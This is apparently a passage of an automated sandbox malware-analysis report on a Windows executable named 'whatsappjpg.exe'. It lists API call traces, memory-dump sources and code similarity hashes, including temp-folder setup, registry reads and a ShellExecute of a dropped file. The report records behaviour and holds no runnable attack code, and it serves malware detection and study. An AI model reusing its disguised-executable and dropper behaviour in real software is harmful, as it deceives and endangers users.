                                                        • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061F3
                                                        • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00406206
                                                      • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00403345
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 4115351271-3283962145
                                                      • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                      • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                                                      • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                      • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                      • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                      • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                      • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                      • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                      • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                      • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                      • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                      • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                      • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                      • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                      • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                      • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                      • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                      • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                      • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                      • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                      • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                      • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                      • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                      • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                      • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FC3
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                        • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                        • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FD4
                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402051
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 334405425-0
                                                      • Opcode ID: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
                                                      • Instruction ID: 49947657582026fbe4aef0e17b19bc3bf563a4cedc03dc09487ed5c70e3121f8
                                                      • Opcode Fuzzy Hash: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
                                                      • Instruction Fuzzy Hash: B521C871904215F6CF206F95CE48A9E7AB0AB09354F70427BF610B51E0D7B94D41DA6E
                                                      APIs
                                                        • Part of subcall function 0040622B: FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406236
                                                        • Part of subcall function 0040622B: FindClose.KERNEL32(00000000), ref: 00406242
                                                      • lstrlenW.KERNEL32 ref: 004021DE
                                                      • lstrlenW.KERNEL32(00000000), ref: 004021E9
                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                      • String ID:
                                                      • API String ID: 1486964399-0
                                                      • Opcode ID: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
                                                      • Instruction ID: 6bed8099c30f558e68629b23c483ae923e88bf7bf978b8bddb761e1df3150e64
                                                      • Opcode Fuzzy Hash: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
                                                      • Instruction Fuzzy Hash: 8C115271D10214A6CB10EFF9C949A9FB7B8EF14314F20843BB511FB2D5D6B899418B59
                                                      APIs
                                                        • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseOpenValue
                                                      • String ID:
                                                      • API String ID: 167947723-0
                                                      • Opcode ID: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
                                                      • Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
                                                      • Opcode Fuzzy Hash: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
                                                      • Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A
                                                      APIs
                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\Uploadable\normallnnens,?), ref: 00401E3D
                                                      Strings
                                                      • C:\Users\user\Uploadable\normallnnens, xrefs: 00401E26
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID: C:\Users\user\Uploadable\normallnnens
                                                      • API String ID: 587946157-3974840194
                                                      • Opcode ID: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
                                                      • Instruction ID: 3f653c9cfcf7a787dcf128efd04e0ef48ce3664fdda10e2cbb7d118b60988be6
                                                      • Opcode Fuzzy Hash: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
                                                      • Instruction Fuzzy Hash: 5EF0F675B54200ABDB006FB5DD4AE9E33B8AB24715F600937F401F70D1D6FC88419629
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: EnumErrorLastWindows
                                                      • String ID:
                                                      • API String ID: 14984897-0
                                                      • Opcode ID: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
                                                      • Instruction ID: 1e4ae0ab9f7d80da0c6c18ef4be67b5a8e29914e0a0cef2da75b429278759b76
                                                      • Opcode Fuzzy Hash: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
                                                      • Instruction Fuzzy Hash: C651A4BA805214DFFB10EF64DCC2B5937A4EB443D4F22842AEA04D722DCF34A994CB95
                                                      APIs
                                                        • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID:
                                                      • API String ID: 3677997916-0
                                                      • Opcode ID: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
                                                      • Instruction ID: 6c75ae994a47700371a60e183d9c6493363f31bd6906e7075ff81e32be465fed
                                                      • Opcode Fuzzy Hash: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
                                                      • Instruction Fuzzy Hash: 6E11A071914205EEDB14CFA1DA585AFB7B4EF04358F60843FE042B72D0D6B85A41DB2A
                                                      APIs
                                                        • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                        • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 004059EC
